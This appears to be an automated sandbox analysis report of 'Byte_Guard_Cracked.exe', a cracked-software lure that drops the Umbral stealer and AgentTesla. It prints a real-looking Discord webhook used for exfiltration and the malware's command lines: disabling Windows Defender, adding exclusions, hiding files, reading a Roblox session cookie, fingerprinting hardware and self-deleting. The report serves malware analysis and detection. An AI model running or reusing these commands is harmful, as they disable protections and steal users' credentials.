Analysis
-
max time kernel
141s -
max time network
145s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
18-08-2024 14:52
Static task
static1
Behavioral task
behavioral1
Sample
Byte_Guard_Cracked.exe
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
Byte_Guard_Cracked.exe
Resource
win10v2004-20240802-en
General
-
Target
Byte_Guard_Cracked.exe
-
Size
4.3MB
-
MD5
d7936c64138b924d63901cedb2c6cd09
-
SHA1
b525dd212eac4c808b5166880976b1817caf826b
-
SHA256
52124dea5ce1c6296873462826b58cf7ced4bc5bff6092af5950769482962339
-
SHA512
3c2e8b6b1de63baeda4fb714ab3f4104f820cf81d2bbe9d4177631246b7627ac1e76c709a57504ca777dfdbcc74aab95602184a270120f653832f37e4965d3f7
-
SSDEEP
98304:dnsmtk2a2052wnEFsuU8agxdazsYXhDqgAdXt2:BL4n7uB8zpXcnb2
Malware Config
Extracted
umbral
https://discord.com/api/webhooks/1271910498107129856/6QtgJK8NkWoaobhUacej3NEYw3eYaasAKEEehxN04UR57cdaVkLvywYwnoPhZkUSYxdW
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Detect Umbral payload 2 IoCs
resource yara_rule behavioral1/files/0x0009000000015d13-35.dat family_umbral behavioral1/memory/2728-76-0x00000000009B0000-0x00000000009F0000-memory.dmp family_umbral -
AgentTesla payload 1 IoCs
resource yara_rule behavioral1/memory/2360-79-0x0000000006400000-0x0000000006612000-memory.dmp family_agenttesla -
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
pid Process 324 powershell.exe 108 powershell.exe 2516 powershell.exe 1536 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts Umbral.exe -
Executes dropped EXE 9 IoCs
pid Process 2852 ._cache_Byte_Guard_Cracked.exe 2920 Synaptics.exe 2712 Umbral.exe 2276 ._cache_Synaptics.exe 1012 Byte Guard.exe 2728 Umbral.exe 2620 Byte Guard.exe 2900 ._cache_Byte Guard.exe 2360 ._cache_Byte Guard.exe -
Loads dropped DLL 16 IoCs
pid Process 2652 Byte_Guard_Cracked.exe 2652 Byte_Guard_Cracked.exe 2652 Byte_Guard_Cracked.exe 2920 Synaptics.exe 2852 ._cache_Byte_Guard_Cracked.exe 2920 Synaptics.exe 2852 ._cache_Byte_Guard_Cracked.exe 2852 ._cache_Byte_Guard_Cracked.exe 2276 ._cache_Synaptics.exe 2276 ._cache_Synaptics.exe 2276 ._cache_Synaptics.exe 2620 Byte Guard.exe 1012 Byte Guard.exe 1012 Byte Guard.exe 2620 Byte Guard.exe 2620 Byte Guard.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\????? = "C:\\ProgramData\\Synaptics\\Synaptics.exe" Byte_Guard_Cracked.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 15 discord.com 14 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 11 ip-api.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 10 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ._cache_Byte Guard.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ._cache_Byte Guard.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Byte_Guard_Cracked.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ._cache_Byte_Guard_Cracked.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Byte Guard.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Synaptics.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ._cache_Synaptics.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Byte Guard.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 3040 cmd.exe 2936 PING.EXE -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 2612 wmic.exe -
Enumerates system info in registry 2 TTPs 6 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion ._cache_Byte Guard.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS ._cache_Byte Guard.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer ._cache_Byte Guard.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion ._cache_Byte Guard.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS ._cache_Byte Guard.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer ._cache_Byte Guard.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2936 PING.EXE -
Suspicious behavior: EnumeratesProcesses 8 IoCs
pid Process 2824 powershell.exe 980 powershell.exe 2728 Umbral.exe 1536 powershell.exe 324 powershell.exe 108 powershell.exe 1504 powershell.exe 2516 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2824 powershell.exe Token: SeDebugPrivilege 980 powershell.exe Token: SeDebugPrivilege 2728 Umbral.exe Token: SeIncreaseQuotaPrivilege 2040 wmic.exe Token: SeSecurityPrivilege 2040 wmic.exe Token: SeTakeOwnershipPrivilege 2040 wmic.exe Token: SeLoadDriverPrivilege 2040 wmic.exe Token: SeSystemProfilePrivilege 2040 wmic.exe Token: SeSystemtimePrivilege 2040 wmic.exe Token: SeProfSingleProcessPrivilege 2040 wmic.exe Token: SeIncBasePriorityPrivilege 2040 wmic.exe Token: SeCreatePagefilePrivilege 2040 wmic.exe Token: SeBackupPrivilege 2040 wmic.exe Token: SeRestorePrivilege 2040 wmic.exe Token: SeShutdownPrivilege 2040 wmic.exe Token: SeDebugPrivilege 2040 wmic.exe Token: SeSystemEnvironmentPrivilege 2040 wmic.exe Token: SeRemoteShutdownPrivilege 2040 wmic.exe Token: SeUndockPrivilege 2040 wmic.exe Token: SeManageVolumePrivilege 2040 wmic.exe Token: 33 2040 wmic.exe Token: 34 2040 wmic.exe Token: 35 2040 wmic.exe Token: SeIncreaseQuotaPrivilege 2040 wmic.exe Token: SeSecurityPrivilege 2040 wmic.exe Token: SeTakeOwnershipPrivilege 2040 wmic.exe Token: SeLoadDriverPrivilege 2040 wmic.exe Token: SeSystemProfilePrivilege 2040 wmic.exe Token: SeSystemtimePrivilege 2040 wmic.exe Token: SeProfSingleProcessPrivilege 2040 wmic.exe Token: SeIncBasePriorityPrivilege 2040 wmic.exe Token: SeCreatePagefilePrivilege 2040 wmic.exe Token: SeBackupPrivilege 2040 wmic.exe Token: SeRestorePrivilege 2040 wmic.exe Token: SeShutdownPrivilege 2040 wmic.exe Token: SeDebugPrivilege 2040 wmic.exe Token: SeSystemEnvironmentPrivilege 2040 wmic.exe Token: SeRemoteShutdownPrivilege 2040 wmic.exe Token: SeUndockPrivilege 2040 wmic.exe Token: SeManageVolumePrivilege 2040 wmic.exe Token: 33 2040 wmic.exe Token: 34 2040 wmic.exe Token: 35 2040 wmic.exe Token: SeDebugPrivilege 1536 powershell.exe Token: SeDebugPrivilege 324 powershell.exe Token: SeDebugPrivilege 108 powershell.exe Token: SeDebugPrivilege 1504 powershell.exe Token: SeIncreaseQuotaPrivilege 2668 wmic.exe Token: SeSecurityPrivilege 2668 wmic.exe Token: SeTakeOwnershipPrivilege 2668 wmic.exe Token: SeLoadDriverPrivilege 2668 wmic.exe Token: SeSystemProfilePrivilege 2668 wmic.exe Token: SeSystemtimePrivilege 2668 wmic.exe Token: SeProfSingleProcessPrivilege 2668 wmic.exe Token: SeIncBasePriorityPrivilege 2668 wmic.exe Token: SeCreatePagefilePrivilege 2668 wmic.exe Token: SeBackupPrivilege 2668 wmic.exe Token: SeRestorePrivilege 2668 wmic.exe Token: SeShutdownPrivilege 2668 wmic.exe Token: SeDebugPrivilege 2668 wmic.exe Token: SeSystemEnvironmentPrivilege 2668 wmic.exe Token: SeRemoteShutdownPrivilege 2668 wmic.exe Token: SeUndockPrivilege 2668 wmic.exe Token: SeManageVolumePrivilege 2668 wmic.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2652 wrote to memory of 2852 2652 Byte_Guard_Cracked.exe 30 PID 2652 wrote to memory of 2852 2652 Byte_Guard_Cracked.exe 30 PID 2652 wrote to memory of 2852 2652 Byte_Guard_Cracked.exe 30 PID 2652 wrote to memory of 2852 2652 Byte_Guard_Cracked.exe 30 PID 2852 wrote to memory of 2824 2852 ._cache_Byte_Guard_Cracked.exe 31 PID 2852 wrote to memory of 2824 2852 ._cache_Byte_Guard_Cracked.exe 31 PID 2852 wrote to memory of 2824 2852 ._cache_Byte_Guard_Cracked.exe 31 PID 2852 wrote to memory of 2824 2852 ._cache_Byte_Guard_Cracked.exe 31 PID 2652 wrote to memory of 2920 2652 Byte_Guard_Cracked.exe 33 PID 2652 wrote to memory of 2920 2652 Byte_Guard_Cracked.exe 33 PID 2652 wrote to memory of 2920 2652 Byte_Guard_Cracked.exe 33 PID 2652 wrote to memory of 2920 2652 Byte_Guard_Cracked.exe 33 PID 2852 wrote to memory of 2712 2852 ._cache_Byte_Guard_Cracked.exe 34 PID 2852 wrote to memory of 2712 2852 ._cache_Byte_Guard_Cracked.exe 34 PID 2852 wrote to memory of 2712 2852 ._cache_Byte_Guard_Cracked.exe 34 PID 2852 wrote to memory of 2712 2852 ._cache_Byte_Guard_Cracked.exe 34 PID 2920 wrote to memory of 2276 2920 Synaptics.exe 35 PID 2920 wrote to memory of 2276 2920 Synaptics.exe 35 PID 2920 wrote to memory of 2276 2920 Synaptics.exe 35 PID 2920 wrote to memory of 2276 2920 Synaptics.exe 35 PID 2852 wrote to memory of 1012 2852 ._cache_Byte_Guard_Cracked.exe 36 PID 2852 wrote to memory of 1012 2852 ._cache_Byte_Guard_Cracked.exe 36 PID 2852 wrote to memory of 1012 2852 ._cache_Byte_Guard_Cracked.exe 36 PID 2852 wrote to memory of 1012 2852 ._cache_Byte_Guard_Cracked.exe 36 PID 2276 wrote to memory of 980 2276 ._cache_Synaptics.exe 37 PID 2276 wrote to memory of 980 2276 ._cache_Synaptics.exe 37 PID 2276 wrote to memory of 980 2276 ._cache_Synaptics.exe 37 PID 2276 wrote to memory of 980 2276 ._cache_Synaptics.exe 37 PID 2276 wrote to memory of 2728 2276 ._cache_Synaptics.exe 39 PID 2276 wrote to memory of 2728 2276 ._cache_Synaptics.exe 39 PID 2276 wrote to memory of 2728 2276 ._cache_Synaptics.exe 39 PID 2276 wrote to memory of 2728 2276 ._cache_Synaptics.exe 39 PID 2276 wrote to memory of 2620 2276 ._cache_Synaptics.exe 40 PID 2276 wrote to memory of 2620 2276 ._cache_Synaptics.exe 40 PID 2276 wrote to memory of 2620 2276 ._cache_Synaptics.exe 40 PID 2276 wrote to memory of 2620 2276 ._cache_Synaptics.exe 40 PID 1012 wrote to memory of 2900 1012 Byte Guard.exe 41 PID 1012 wrote to memory of 2900 1012 Byte Guard.exe 41 PID 1012 wrote to memory of 2900 1012 Byte Guard.exe 41 PID 1012 wrote to memory of 2900 1012 Byte Guard.exe 41 PID 2620 wrote to memory of 2360 2620 Byte Guard.exe 42 PID 2620 wrote to memory of 2360 2620 Byte Guard.exe 42 PID 2620 wrote to memory of 2360 2620 Byte Guard.exe 42 PID 2620 wrote to memory of 2360 2620 Byte Guard.exe 42 PID 2728 wrote to memory of 2040 2728 Umbral.exe 43 PID 2728 wrote to memory of 2040 2728 Umbral.exe 43 PID 2728 wrote to memory of 2040 2728 Umbral.exe 43 PID 2728 wrote to memory of 1764 2728 Umbral.exe 47 PID 2728 wrote to memory of 1764 2728 Umbral.exe 47 PID 2728 wrote to memory of 1764 2728 Umbral.exe 47 PID 2728 wrote to memory of 1536 2728 Umbral.exe 49 PID 2728 wrote to memory of 1536 2728 Umbral.exe 49 PID 2728 wrote to memory of 1536 2728 Umbral.exe 49 PID 2728 wrote to memory of 324 2728 Umbral.exe 51 PID 2728 wrote to memory of 324 2728 Umbral.exe 51 PID 2728 wrote to memory of 324 2728 Umbral.exe 51 PID 2728 wrote to memory of 108 2728 Umbral.exe 53 PID 2728 wrote to memory of 108 2728 Umbral.exe 53 PID 2728 wrote to memory of 108 2728 Umbral.exe 53 PID 2728 wrote to memory of 1504 2728 Umbral.exe 55 PID 2728 wrote to memory of 1504 2728 Umbral.exe 55 PID 2728 wrote to memory of 1504 2728 Umbral.exe 55 PID 2728 wrote to memory of 2668 2728 Umbral.exe 57 PID 2728 wrote to memory of 2668 2728 Umbral.exe 57 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 1764 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Byte_Guard_Cracked.exe"C:\Users\Admin\AppData\Local\Temp\Byte_Guard_Cracked.exe"1⤵
- Loads dropped DLL
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2652 -
C:\Users\Admin\AppData\Local\Temp\._cache_Byte_Guard_Cracked.exe"C:\Users\Admin\AppData\Local\Temp\._cache_Byte_Guard_Cracked.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2852 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHgAYwBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAcwBhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAaABxACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAZQBhACMAPgA="3⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2824
-
-
C:\Users\Admin\AppData\Local\Umbral.exe"C:\Users\Admin\AppData\Local\Umbral.exe"3⤵
- Executes dropped EXE
PID:2712
-
-
C:\Users\Admin\AppData\Local\Byte Guard.exe"C:\Users\Admin\AppData\Local\Byte Guard.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1012 -
C:\Users\Admin\AppData\Local\Temp\._cache_Byte Guard.exe"C:\Users\Admin\AppData\Local\Temp\._cache_Byte Guard.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:2900
-
-
-
-
C:\ProgramData\Synaptics\Synaptics.exe"C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate2⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2920 -
C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe"C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe" InjUpdate3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2276 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHgAYwBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAcwBhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAaABxACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAZQBhACMAPgA="4⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:980
-
-
C:\Users\Admin\AppData\Local\Umbral.exe"C:\Users\Admin\AppData\Local\Umbral.exe"4⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2728 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid5⤵
- Suspicious use of AdjustPrivilegeToken
PID:2040
-
-
C:\Windows\system32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Umbral.exe"5⤵
- Views/modifies file attributes
PID:1764
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Umbral.exe'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1536
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 25⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:324
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:108
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1504
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption5⤵
- Suspicious use of AdjustPrivilegeToken
PID:2668
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory5⤵PID:2808
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid5⤵PID:2804
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2516
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name5⤵
- Detects videocard installed
PID:2612
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Umbral.exe" && pause5⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:3040 -
C:\Windows\system32\PING.EXEping localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2936
-
-
-
-
C:\Users\Admin\AppData\Local\Byte Guard.exe"C:\Users\Admin\AppData\Local\Byte Guard.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2620 -
C:\Users\Admin\AppData\Local\Temp\._cache_Byte Guard.exe"C:\Users\Admin\AppData\Local\Temp\._cache_Byte Guard.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:2360
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Defense Evasion
Hide Artifacts
1Hidden Files and Directories
1Modify Registry
1Obfuscated Files or Information
1Command Obfuscation
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
4.3MB
MD5d7936c64138b924d63901cedb2c6cd09
SHA1b525dd212eac4c808b5166880976b1817caf826b
SHA25652124dea5ce1c6296873462826b58cf7ced4bc5bff6092af5950769482962339
SHA5123c2e8b6b1de63baeda4fb714ab3f4104f820cf81d2bbe9d4177631246b7627ac1e76c709a57504ca777dfdbcc74aab95602184a270120f653832f37e4965d3f7
-
Filesize
2.5MB
MD5068b2d1729ce3ea43aca321d35983886
SHA11f0265d64f80734687a5abff64163f735933ba40
SHA2567d356312b37eac1a8c175c3b715b650ef881ba83096d242a87dee1439e14aaa3
SHA51201241980cbf6d6a2f8935790e7d509e487c541590766a290b7dab889bcea6c367170d2d5c56bead75693b78e596af72b00ee22241c2c5b51e8f5384e393af0cd
-
Filesize
3.6MB
MD5c53c9140b7d6c214c6d168d34365418c
SHA172144ae7d77432b217f73be33eae773f7cc0dcf7
SHA2568d0405c5776efbedc678af7096a129fea77d1df352a23bf87a9fa3485d2ea143
SHA512f4f912b5784eacfecbf3fcf6876ed573df519070a2d663eb7985a8544a28b03fade339c2eca93b2da7f1240cec60ae1929b81f217c711e575e2d2908ddb80910
-
Filesize
229KB
MD506b38b4286ab07b09e34030a13893cf8
SHA11741b0fec5104f2237c84f86e400b34ee457f510
SHA256426f84b164f029d25bd87377d930c1532dd9fb1f490f0ddb2906f2c8006a2f8f
SHA512e752bfa062a46682209dc8d5685b583a523af9a594ed92cb1ce97fda652ded92cffa032b1b69110ca04d7f52a7532aaa3011facfdd90baaeec91515424573df4
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5b59c9b76539b70b090522a05e518145a
SHA1c7461ed830d81a7c2e6935aa727ed711928a510f
SHA25669435fe4c1271bdff297bd8f9b19413d56386cd1bb904a693550495e658b990d
SHA51276e23d4aa496d15dce4321eaf16324fdc3824e40cdbd822cf58e305d57f16a55bc410d4807488991001801f906f0eaa60bcf615763ea7e0824e35fd407818b11
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\MA90FBTRURF4QDUPQIR8.temp
Filesize7KB
MD567a06a44407d06f26a191ecd025ccf1f
SHA16c4422f80eec7aacb5d6a3deced4033febf94033
SHA2561b249158d63e8efcf38490ab017844ef9bdda8acbbafe029df1e780a3d69f73c
SHA512cda521c30b1572779cbb94c380888f09bcd62ec921776e0f7276b05698cc71bb3e4c9811782fee2faba2281821fef737ab608991761ebe1604574cb7388a0db4
-
Filesize
3.2MB
MD55d317aa06f8daf4558eb1a48f20a67bd
SHA1e574b2144d7e64ad354074460eb10d6a8d55ef7b
SHA256d76287c021bc3320cd53e42b62a86e3064f56f80158066381d57dfadd64b5a79
SHA5128576d946d69cfbea20b5d4bba7e2620c78017de38cb4fdd6e7d8b768c7e3f21291314aa2b27eb9939c7ddeea08e44e36bb828e53ace370f52ee28ecb6e90ad24